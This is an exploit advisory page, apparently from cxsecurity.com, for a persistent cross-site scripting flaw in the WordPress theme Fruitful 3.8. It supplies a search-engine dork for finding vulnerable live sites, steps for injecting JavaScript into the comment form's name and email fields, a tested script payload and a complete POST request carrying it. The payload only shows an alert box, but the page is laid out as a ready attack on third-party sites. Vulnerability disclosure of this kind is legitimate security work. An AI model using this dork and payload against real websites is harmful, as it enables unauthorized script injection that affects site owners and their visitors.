WordPress Fruitful 3.8 Cross Site Scripting

2020.02.19
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting # Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply" # Date: 2020-02-14 # Category : Webapps # Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip # Vendor Homepage: https://github.com/Fruitfulcode/Fruitful # Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari) # Team Members: Behzad Khalifeh , Milad Ranjbar # Version: 3.8 # Tested on: Windows/Linux # CVE: N/A .:: Theme Description ::. Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design. .:: Proof Of Concept (PoC) ::. Step 1 - Find Your Target With above Dork. Step 2 - Inject Your Java Script Codes to Name & Email Fields Step 3 - Click Post Comment .:: Tested Payload ::. '>"><script>alert(/XSS By UltraSecurity/)</script> .:: Post Request ::. comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top